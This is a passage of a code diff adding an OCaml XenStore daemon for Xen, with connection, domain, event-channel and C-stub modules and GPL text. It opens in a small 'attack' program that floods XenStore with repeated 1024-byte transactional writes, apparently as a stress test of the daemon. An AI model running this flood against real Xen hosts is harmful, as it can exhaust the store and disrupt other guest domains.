+let transaction_end connection transaction_id =
+  connection#write (Message.make Message.XS_TRANSACTION_END transaction_id 0l 
(Utils.null_terminate "T"));
+  (Utils.strip_null (read connection).Message.payload) = "OK";;
+
+let write connection transaction_id path value =
+  connection#write (Message.make Message.XS_WRITE transaction_id 0l 
((Utils.null_terminate path) ^ value));
+  (Utils.strip_null (read connection).Message.payload) = "OK";;
+
+let main () =
+  Printf.printf "Initialising attack...\n"; flush stdout;
+  
+  let domain_id = ref 0
+  and verbose = ref false in
+  
+  (* Parse command-line arguments *)
+  Arg.parse [
+    ("--domid", Arg.Set_int domain_id, "   specify ID of this domain");
+    ("--verbose", Arg.Set verbose, "   specify ID of this domain");
+    ] (fun s -> ()) "";
+  
+  let connection = new Connection.connection (new Socket.socket_interface fd 
true in_set out_set) in
+  
+  Printf.printf "Initialised\n";
+  Printf.printf "Getting domain path...\n"; flush stdout;
+  
+  let domain_path = get_domain_path connection 0l !domain_id in
+  
+  Printf.printf "%s\n" domain_path; flush stdout;
+  
+  let attack_path = domain_path ^ Store.dividor_str ^ "attack"
+  and attack_payload = String.make 1024 'a' in
+  
+  Printf.printf "Attacking...\n"; flush stdout;
+  
+  let rec attack_loop () = (
+      let transaction_id = transaction_start connection in
+      if (write connection transaction_id attack_path attack_payload) then (
+        if (transaction_end connection transaction_id) then (attack_loop ());
+      );
+    )
+  in
+  
+  attack_loop ();
+  
+  Printf.printf "\nDone\n"; flush stdout;;
+
+main ();;
diff -r 10a8fae412c5 tools/xenstore/connection.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/connection.ml      Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,95 @@
+(* 
+    Connections for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+class buffer length =
+object (self)
+  val m_buffer = String.make length Constants.null_char
+  val mutable m_position = 0
+  method private position = m_position
+  method buffer = String.copy m_buffer
+  method clear =
+    String.blit (String.make self#length Constants.null_char) 0 m_buffer 0 
self#length;
+    m_position <- 0
+  method length = String.length m_buffer
+  method remaining = self#length - self#position
+  method write data =
+    let length = (String.length data) in
+    String.blit data 0 m_buffer m_position length;
+    m_position <- m_position + length
+end
+
+class buffered_message =
+object (self)
+  val m_header = new buffer Message.header_size
+  val mutable m_payload = new buffer 0
+  method allocate_payload length = m_payload <- new buffer length
+  method clear =
+    self#header#clear;
+    self#allocate_payload 0
+  method header = m_header
+  method in_header = self#header#remaining <> 0
+  method in_payload = self#payload#remaining <> 0
+  method message =
+    if self#in_header
+    then Message.null_message
+    else (
+      let header = Message.deserialise_header self#header#buffer in
+      let payload = if self#payload#length = 0 then String.make 
header.Message.length Constants.null_char else self#payload#buffer in
+      Message.make header.Message.message_type header.Message.transaction_id 
header.Message.request_id payload
+    )
+  method payload = m_payload
+end
+
+class connection (interface : Interface.interface) =
+object (self)
+  val m_input_buffer = new buffered_message
+  val m_interface = interface
+  method private interface = m_interface
+  method private input_buffer = m_input_buffer
+  method private read_buffer buffer =
+    let read_buffer = String.make buffer#remaining Constants.null_char in
+    let bytes = self#interface#read read_buffer 0 (String.length read_buffer) 
in
+    if bytes < 0
+    then raise (Constants.Xs_error (Constants.EIO, 
"Connection.connection#read_buffer", "Error reading from interface"))
+    else (buffer#write (String.sub read_buffer 0 bytes); buffer#remaining = 0)
+  method private write_buffer buffer offset =
+    let length = String.length buffer in
+    let bytes_written = self#interface#write buffer offset (length - offset) in
+    if offset + bytes_written < length then self#write_buffer buffer (offset + 
bytes_written)
+  method can_read = self#interface#can_read
+  method can_write = self#interface#can_write
+  method destroy = self#interface#destroy
+  method read =
+    let input = self#input_buffer in
+    if input#in_header && self#read_buffer input#header
+    then (
+      let length = input#message.Message.header.Message.length in
+      if length > Constants.payload_max
+      then raise (Constants.Xs_error (Constants.EIO, 
"Connection.connection#read", "Payload too big"))
+      else input#allocate_payload length
+    );
+    if (not input#in_header && not input#in_payload) || (input#in_payload && 
self#read_buffer input#payload)
+    then (
+      let message = input#message in
+      input#clear;
+      Some (message)
+    )
+    else None
+  method write message = self#write_buffer ((Message.serialise_header 
message.Message.header) ^ message.Message.payload) 0
+end
diff -r 10a8fae412c5 tools/xenstore/constants.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/constants.ml       Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,82 @@
+(* 
+    Constants for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+let path_max = 4096
+let absolute_path_max = 3072
+let relative_path_max = 2048
+let payload_max = 4096
+
+(* domain_id_self is used in certain contexts to refer to oneself *)
+let domain_id_self = 0x7FF0
+
+(* The prefix character that indicates a watch event *)
+let event_char = '@'
+
+let null_char = char_of_int 0
+let null_string = String.make 0 null_char
+let null_file_descr = - 1
+
+let payload_false = "F"
+let payload_true = "T"
+
+let virq_dom_exc = 3
+
+(* Error type *)
+type error =
+  | EINVAL
+  | EACCES
+  | EEXIST
+  | EISDIR
+  | ENOENT
+  | ENOMEM
+  | ENOSPC
+  | EIO
+  | ENOTEMPTY
+  | ENOSYS
+  | EROFS
+  | EBUSY
+  | EAGAIN
+  | EISCONN
+  (* XXX: Hack to fix violation of errors specified in protocol *)
+  | E2BIG
+  | EPERM
+
+(* Return the string representation of an error *)
+let error_message error =
+  match error with
+  | EINVAL -> "EINVAL"
+  | EACCES -> "EACCES"
+  | EEXIST -> "EEXIST"
+  | EISDIR -> "EISDIR"
+  | ENOENT -> "ENOENT"
+  | ENOMEM -> "ENOMEM"
+  | ENOSPC -> "ENOSPC"
+  | EIO -> "EIO"
+  | ENOTEMPTY -> "ENOTEMPTY"
+  | ENOSYS -> "ENOSYS"
+  | EROFS -> "EROFS"
+  | EBUSY -> "EBUSY"
+  | EAGAIN -> "EAGAIN"
+  | EISCONN -> "EISCONN"
+  (* XXX: Hack to fix violation of errors specified in protocol *)
+  | E2BIG -> "E2BIG"
+  | EPERM -> "EPERM"
+
+(* Error exception *)
+exception Xs_error of error * string * string
diff -r 10a8fae412c5 tools/xenstore/domain.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/domain.ml  Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,105 @@
+(* 
+    Domains for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+let xc_handle = Eventchan.xc_interface_open ()
+
+class domain (id : int) (connection : Connection.connection) =
+object (self)
+  val m_id = id
+  val m_connection = connection
+  val mutable m_input_list = []
+  val mutable m_output_list = []
+  val mutable m_dying = false
+  val mutable m_shutdown = false
+  method private connection = m_connection
+  method private input_list = m_input_list
+  method private output_list = m_output_list
+  method add_input_message message = m_input_list <- m_input_list @ [ message ]
+  method add_output_message message = m_output_list <- m_output_list @ [ 
message ]
+  method can_read = self#connection#can_read
+  method can_write = self#has_output_message && self#connection#can_write
+  method destroy = self#connection#destroy
+  method dying = m_dying <- true
+  method has_input_message = List.length self#input_list > 0
+  method has_output_message = List.length self#output_list > 0
+  method id = m_id
+  method input_message =
+    let message = List.hd self#input_list in
+    m_input_list <- List.tl m_input_list;
+    message
+  method input_messages = self#input_list
+  method is_dying = m_dying
+  method is_shutdown = m_shutdown
+  method output_message =
+    let message = List.hd self#output_list in
+    m_output_list <- List.tl m_output_list;
+    message
+  method output_messages = self#output_list
+  method read = match self#connection#read with Some (message) -> 
self#add_input_message message | None -> ()
+  method shutdown = m_shutdown <- true
+  method write = self#connection#write self#output_message
+end
+
+class domains =
+object (self)
+  val m_dominfo = Dominfo.init ()
+  val m_entries = Hashtbl.create 8
+  val mutable m_domains : domain list = []
+  method private check domain =
+    if Dominfo.info self#dominfo xc_handle domain#id = 1 && Dominfo.domid 
self#dominfo = domain#id
+    then (
+      if (Dominfo.crashed self#dominfo || Dominfo.shutdown self#dominfo) && 
not domain#is_shutdown then domain#shutdown;
+      if Dominfo.dying self#dominfo then domain#dying
+    );
+    domain#is_dying || domain#is_shutdown
+  method private dominfo = m_dominfo
+  method private entries = m_entries
+  method add domain =
+    m_domains <- domain :: m_domains;
+    Hashtbl.add self#entries domain#id 0
+  method cleanup = List.fold_left (fun domains domain -> if self#check domain 
then domain :: domains else domains) [] self#domains
+  method domains = m_domains
+  method entry_count domain_id = Hashtbl.find self#entries domain_id
+  method entry_decr domain_id =
+    let entries = try pred (Hashtbl.find self#entries domain_id) with 
Not_found -> 0 in
+    Hashtbl.replace self#entries domain_id (if entries < 0 then 0 else entries)
+  method entry_incr domain_id = Hashtbl.replace self#entries domain_id (try 
succ (Hashtbl.find self#entries domain_id) with Not_found -> 1)
+  method find_by_id domain_id = List.find (fun domain -> domain#id = 
domain_id) self#domains
+  method remove (domain : domain) =
+    m_domains <- List.filter (fun dom -> domain#id <> dom#id) self#domains;
+    Hashtbl.remove self#entries domain#id;
+    domain#destroy
+  method timeout = if List.exists (fun domain -> domain#can_read || 
domain#can_write) self#domains then 0.0 else - 1.0
+end
+
+(* Initialise an unprivileged domain *)
+let domu_init id remote_port mfn notify =
+  let port = Eventchan.bind_interdomain id remote_port in
+  let interface = new Xenbus.xenbus_interface port (Xenbus.map_foreign 
xc_handle id mfn) in
+  let connection = new Connection.connection interface in
+  if notify then Eventchan.notify port;
+  new domain id connection
+
+(* Check if a domain is unprivileged based on its ID *)
+let is_unprivileged_id domain_id =
+  domain_id > 0
+  
+(* Check if a domain is unprivileged *)
+let is_unprivileged domain =
+  is_unprivileged_id domain#id
diff -r 10a8fae412c5 tools/xenstore/dominfo.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/dominfo.ml Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,47 @@
+(* 
+    Domain info for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+type t;;
+
+external get_crashed32 : t -> int32 = "get_crashed_c";;
+external get_domid32 : t -> int32 = "get_domid_c";;
+external get_dying32 : t -> int32 = "get_dying_c";;
+external get_shutdown32 : t -> int32 = "get_shutdown_c";;
+external init : unit -> t = "init_dominfo_c";;
+external xc_domain_getinfo : int -> int -> int -> t -> int = 
"xc_domain_getinfo_c";;
+
+(* Return crashed state *)
+let crashed dominfo =
+  get_crashed32 dominfo <> 0l
+
+(* Return domain ID *)
+let domid dominfo =
+  Int32.to_int (get_domid32 dominfo)
+
+(* Return dying state *)
+let dying dominfo =
+  get_dying32 dominfo <> 0l
+
+(* Return domain info *)
+let info dominfo xc_handle id =
+  xc_domain_getinfo xc_handle id 1 dominfo
+
+(* Return shutdown state *)
+let shutdown dominfo =
+  get_shutdown32 dominfo <> 0l
diff -r 10a8fae412c5 tools/xenstore/dominfo_c.c
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/dominfo_c.c        Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,93 @@
+/*
+    Domain info C stubs for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*/
+
+#include <stdio.h>
+#include <unistd.h>
+
+#include <xenctrl.h>
+#include <xen/domctl.h>
+
+#include <caml/mlvalues.h>
+#include <caml/callback.h>
+#include <caml/memory.h>
+#include <caml/alloc.h>
+
+/* Initialise a domain's info */
+value init_dominfo_c (value dummy_v)
+{
+       CAMLparam1 (dummy_v);
+
+       value dominfo_v = alloc (Abstract_tag, 1);
+       Field (dominfo_v, 0) = (value) malloc (sizeof(xc_dominfo_t));
+
+       CAMLreturn (dominfo_v);
+}
+
+/* Return a domain's info */
+value xc_domain_getinfo_c (value fd_v, value domid_v, value max_doms_v, value 
dominfo_v)
+{
+       CAMLparam4 (fd_v, domid_v, max_doms_v, dominfo_v);
+
+       int fd = Int_val (fd_v);
+       uint32_t domid = (uint32_t)(Int_val (domid_v));
+       unsigned int max_doms = Int_val (max_doms_v);
+       xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0));
+
+       CAMLreturn (Val_int (xc_domain_getinfo(fd, domid, max_doms, dominfo)));
+}
+
+/* Return a domain's crashed state */
+value get_crashed_c (value dominfo_v)
+{
+       CAMLparam1 (dominfo_v);
+
+       xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0));
+
+       CAMLreturn (caml_copy_int32(dominfo->crashed));
+}
+
+/* Return a domain's ID */
+value get_domid_c (value dominfo_v)
+{
+       CAMLparam1 (dominfo_v);
+
+       xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0));
+
+       CAMLreturn (caml_copy_int32(dominfo->domid));
+}
+
+/* Return a domain's dying state */
+value get_dying_c (value dominfo_v)
+{
+       CAMLparam1 (dominfo_v);
+
+       xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0));
+
+       CAMLreturn (caml_copy_int32(dominfo->dying));
+}
+
+/* Return a domain's shutdown state */
+value get_shutdown_c (value dominfo_v)
+{
+       CAMLparam1 (dominfo_v);
+
+       xc_dominfo_t *dominfo = (xc_dominfo_t *)(Field (dominfo_v, 0));
+
+       CAMLreturn (caml_copy_int32(dominfo->shutdown));
+}
diff -r 10a8fae412c5 tools/xenstore/eventchan.ml
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/eventchan.ml       Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,68 @@
+(* 
+    Event channel for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*)
+
+external fake_call : unit -> int = "xc_interface_open"
+external xc_event_chan_bind_interdomain : int -> int -> int -> int = 
"xc_evtchn_bind_interdomain_c"
+external xc_event_chan_bind_virq : int -> int -> int = "xc_evtchn_bind_virq_c"
+external xc_event_chan_fd : int -> int = "xc_evtchn_fd_c"
+external xc_event_chan_open : unit -> int = "xc_evtchn_open_c"
+external xc_event_chan_notify : int -> int -> int = "xc_evtchn_notify_c"
+external xc_event_chan_pending : int -> int = "xc_evtchn_pending_c"
+external xc_event_chan_unbind : int -> int -> int = "xc_evtchn_unbind_c"
+external xc_event_chan_unmask : int -> int -> int = "xc_evtchn_unmask_c"
+external xc_interface_open : unit -> int = "xc_interface_open_c"
+external xc_interface_close : int -> int = "xc_interface_close_c"
+
+(* XXX: Force libxenctrl to be compiled in. There must be a better way *)
+let fake () =
+  fake_call ()
+
+let xce_handle = ref (- 1)
+
+(* Bind a domain to the remove end *)
+let bind_interdomain id remote_port =
+  xc_event_chan_bind_interdomain !xce_handle id remote_port
+
+(* Bind the virq *)
+let bind_virq virq =
+  xc_event_chan_bind_virq !xce_handle virq
+
+(* Return the event channel fd *)
+let get_channel () =
+  xc_event_chan_fd !xce_handle
+
+(* Intialise the event channel *)
+let init () =
+  xce_handle := xc_event_chan_open ()
+
+(* Notify XenBus *)
+let notify port =
+  ignore (xc_event_chan_notify !xce_handle port)
+
+(* Check for pending event *)
+let pending () =
+  xc_event_chan_pending !xce_handle
+
+(* Unbind a XenBus port *)
+let unbind port =
+  xc_event_chan_unbind !xce_handle port <> - 1
+
+(* Unmask a XenBus port *)
+let unmask port =
+  xc_event_chan_unmask !xce_handle port
diff -r 10a8fae412c5 tools/xenstore/eventchan_c.c
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/eventchan_c.c      Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,124 @@
+/*
+    Event channel C stubs for OCaml XenStore Daemon.
+    Copyright (C) 2008 Patrick Colp University of British Columbia
+
+    This program is free software; you can redistribute it and/or modify
+    it under the terms of the GNU General Public License as published by
+    the Free Software Foundation; either version 2 of the License, or
+    (at your option) any later version.
+
+    This program is distributed in the hope that it will be useful,
+    but WITHOUT ANY WARRANTY; without even the implied warranty of
+    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+    GNU General Public License for more details.
+
+    You should have received a copy of the GNU General Public License
+    along with this program; if not, write to the Free Software
+    Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
+*/
+
+#include <stdio.h>
+#include <unistd.h>
+#include <xenctrl.h>
+
+#include <caml/mlvalues.h>
+#include <caml/callback.h>
+#include <caml/memory.h>
+
+
+/* Bind an interdomain event channel */
+value xc_evtchn_bind_interdomain_c (value xce_handle_v, value domid_v, value 
remote_port_v)
+{
+    CAMLparam3 (xce_handle_v, domid_v, remote_port_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+    int domid = Int_val (domid_v);
+    uint32_t remote_port = (uint32_t)(Int_val (remote_port_v));
+
+    CAMLreturn (Val_int (xc_evtchn_bind_interdomain (xce_handle, domid, 
remote_port)));
+}
+
+/* Bind the VIRQ event channel */
+value xc_evtchn_bind_virq_c (value xce_handle_v, value virq_v)
+{
+    CAMLparam2 (xce_handle_v, virq_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+    unsigned int virq = Int_val (virq_v);
+
+    CAMLreturn (Val_int (xc_evtchn_bind_virq (xce_handle, virq)));
+}
+
+/* Return the event channel file descriptor */
+value xc_evtchn_fd_c (value xce_handle_v)
+{
+    CAMLparam1 (xce_handle_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+
+    CAMLreturn (Val_int (xc_evtchn_fd (xce_handle)));
+}
+
+/* Notify an event channel of an event */
+value xc_evtchn_notify_c (value xce_handle_v, value port_v)
+{
+    CAMLparam2 (xce_handle_v, port_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+    uint32_t port = (uint32_t)(Int_val (port_v));
+
+    CAMLreturn (Val_int (xc_evtchn_notify (xce_handle, port)));
+}
+
+/* Open the event channel */
+value xc_evtchn_open_c (value dummy_v)
+{
+    CAMLparam1 (dummy_v);
+    CAMLreturn (Val_int (xc_evtchn_open ()));
+}
+
+/* Check an event channel for pending events */
+value xc_evtchn_pending_c (value xce_handle_v)
+{
+    CAMLparam1 (xce_handle_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+
+    CAMLreturn (Val_int (xc_evtchn_pending (xce_handle)));
+}
+
+/* Unbind an event channel */
+value xc_evtchn_unbind_c (value xce_handle_v, value port_v)
+{
+    CAMLparam2 (xce_handle_v, port_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+    uint32_t port = (uint32_t)(Int_val (port_v));
+
+    CAMLreturn (Val_int (xc_evtchn_unbind (xce_handle, port)));
+}
+
+/* Unmask an event channel */
+value xc_evtchn_unmask_c (value xce_handle_v, value port_v)
+{
+    CAMLparam2 (xce_handle_v, port_v);
+
+    int xce_handle = Int_val (xce_handle_v);
+    uint32_t port = (uint32_t)(Int_val (port_v));
+
+    CAMLreturn (Val_int (xc_evtchn_unmask (xce_handle, port)));
+}
+
+/* Close the XenBus interface */
+value xc_interface_close_c (value xc_handle_v)
+{
+    CAMLparam1 (xc_handle_v);
+    CAMLreturn (Val_int (xc_interface_close (Int_val (xc_handle_v))));
+}
+
+/* Open the XenBus interface */
+value xc_interface_open_c (value dummy_v)
+{
+    CAMLparam1 (dummy_v);
+    CAMLreturn (Val_int (xc_interface_open ()));
+}
diff -r 10a8fae412c5 tools/xenstore/gpl-2.0.txt
--- /dev/null   Thu Jan 01 00:00:00 1970 +0000
+++ b/tools/xenstore/gpl-2.0.txt        Thu Jan 15 15:44:05 2009 -0800
@@ -0,0 +1,339 @@
+                   GNU GENERAL PUBLIC LICENSE
+                      Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                           Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                   GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
